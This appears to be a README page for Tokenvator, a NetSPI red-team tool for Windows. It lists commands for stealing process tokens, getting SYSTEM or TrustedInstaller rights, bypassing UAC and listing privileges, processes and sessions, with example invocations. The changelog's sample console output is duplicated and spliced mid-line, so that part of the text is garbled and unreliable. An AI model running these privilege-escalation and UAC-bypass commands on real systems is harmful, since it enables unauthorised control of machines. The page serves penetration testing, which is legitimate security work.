Tokenvator
A tool to elevate privilege with Windows Tokens
This tool has two methods of operation – interactive and argument modes
Interactive Mode:
C:> tokenvator.exe
(Tokens) > steal_token 908 cmd.exe
(Tokens) >
Arguments Mode:
C:> tokenvator.exe steal_token 908 cmd.exe
C:>
Methods
-
GetSystem
- Optional Parameters: Process ID, Command
- Examples:
(Tokens) > GetSystem
or
(Tokens) > GetSystem 504
or
(Tokens) > GetSystem 504 regedit.exe
-
GetTrustedInstaller
- Optional Parameters: Command
- Examples:
(Tokens) > GetTrustedInstaller
or
(Tokens) > GetTrustedInstaller regedit.exe
-
Steal_Token
- Parameters: Process ID
- Optional Parameters: Command
- Examples:
(Tokens) > StealToken 1008
or
(Tokens) > StealToken calc regedit.exe
or
(Tokens) > StealToken 1008 regedit.exe
-
BypassUAC
- Parameters: Process ID
- Optional Parameters: Command
- Examples:
(Tokens) > BypassUAC 1008
or
(Tokens) > BypassUAC regedit.exe
or
(Tokens) > BypassUAC 1008 regedit.exe
-
List_Privileges
- Parameters: –
- Optional Parameters: –
- Examples:
(Tokens) > List_Privileges
-
Set_Privileges
- Parameters: Privilege
- Optional Parameters: –
- Examples:
(Tokens) > Set_Privileges SeSecurityPrivilege
-
List_Processes
- Parameters: –
- Optional Parameters: –
- Examples:
(Tokens) > List_Processes
-
List_Processes_WMI
- Parameters: –
- Optional Parameters: –
- Examples:
(Tokens) > List_Processes_WMI
-
Find_User_Processes
- Parameters: Username
- Optional Parameters: –
- Examples:
(Tokens) > Find_User_Processes domain\user
-
Find_User_Processes_WMI
- Parameters: Username
- Optional Parameters: –
- Examples:
(Tokens) > Find_User_Processes_WMI domain\user
-
List_User_Sessions
- Parameters: –
- Optional Parameters: –
- Examples:
(Tokens) > List_User_Sessions
-
WhoAmI
- Parameters: –
- Optional Parameters: –
- Examples:
(Tokens) > WhoAmI
-
RevertToSelf
- Parameters: –
- Optional Parameters: –
- Examples:
(Tokens) > RevertToSelf
-
Run
- Parameters: Command
- Optional Parameters: –
- Examples:
(Tokens) > Run cmd.exe
Changelog v2.1.1
- Update to add support for interactive sub-processes
(Tokens) > run cmd.exe
[+] Starting cmd.exe
[*] Note: The prompt is currently missing for input
Microsoft Windows [Version 10.0.17763.379]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
C:\Tokenvator\Tokenvator\bin\Release-Net45>whoami
windows10pro(Tokens) > run cmd.exe
[+] Starting cmd.exe
[*] Note: The prompt is currently missing for input
Microsoft Windows [Version 10.0.17763.379]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
C:\Tokenvator\Tokenvator\bin\Release-Net45>whoami
windows10pro\0xbadjuju
dir
C:\Tokenvator\Tokenvator\bin\Release-Net45>dir
Volume in drive C has no label.
Volume Serial Number is A624-B8DD
Directory of C:\Tokenvator\Tokenvator\bin\Release-Net45
03/22/2019 11:38 AM <DIR> .
03/22/2019 11:38 AM <DIR> ..
09/15/2018 02:29 AM 3,010,560 System.Management.Automation.dll
02/21/2019 11:45 AM 161 Tokenvator.exe.config
03/22/2019 11:28 AM 112,128 Tokenvator.pdb
03/22/2019 11:28 AM 117,760 Tokenvator.exe
4 File(s) 3,240,609 bytes
2 Dir(s) 84,676,734,976 bytes free
exit
C:\Tokenvator\Tokenvator\bin\Release-Net45>exit
(Tokens) > run powershell.exe
[+] Starting powershell.exe
[*] Note: The prompt is currently missing for input
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
gci
PS C:\Tokenvator\Tokenvator\bin\Release-Net45> gci
Directory: C:\Tokenvator\Tokenvator\bin\Release-Net45
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/15/2018 2:29 AM 3010560 System.Management.Automation.dll
-a---- 2/21/2019 10:45 AM 161 Tokenvator.exe.config
-a---- 3/22/2019 11:28 AM 112128 Tokenvator.pdb
-a---- 3/22/2019 11:28 AM 117760 Tokenvator.exe
exit
PS C:\Tokenvator\Tokenvator\bin\Release-Net45> exit
xbadjuju
dir
C:\Tokenvator\Tokenvator\bin\Release-Net45>dir
Volume in drive C has no label.
Volume Serial Number is A624-B8DD
Directory of C:\Tokenvator\Tokenvator\bin\Release-Net45
03/22/2019 11:38 AM <DIR> .
03/22/2019 11:38 AM <DIR> ..
09/15/2018 02:29 AM 3,010,560 System.Management.Automation.dll
02/21/2019 11:45 AM 161 Tokenvator.exe.config
03/22/2019 11:28 AM 112,128 Tokenvator.pdb
03/22/2019 11:28 AM 117,760 Tokenvator.exe
4 File(s) 3,240,609 bytes
2 Dir(s) 84,676,734,976 bytes free
exit
C:\Tokenvator\Tokenvator\bin\Release-Net45>exit
(Tokens) > run powershell.exe
[+] Starting powershell.exe
[*] Note: The prompt is currently missing for input
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
gci
PS C:\Tokenvator\Tokenvator\bin\Release-Net45> gci
Directory: C:\Tokenvator\Tokenvator\bin\Release-Net45
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/15/2018 2:29 AM 3010560 System.Management.Automation.dll
-a---- 2/21/2019 10:45 AM 161 Tokenvator.exe.config
-a---- 3/22/2019 11:28 AM 112128 Tokenvator.pdb
-a---- 3/22/2019 11:28 AM 117760 Tokenvator.exe
exit
PS C:\Tokenvator\Tokenvator\bin\Release-Net45> exit
Download
Copyright (C) Alexander Leary (@0xbadjuju), NetSPI – 2018
Source: https://github.com/0xbadjuju/
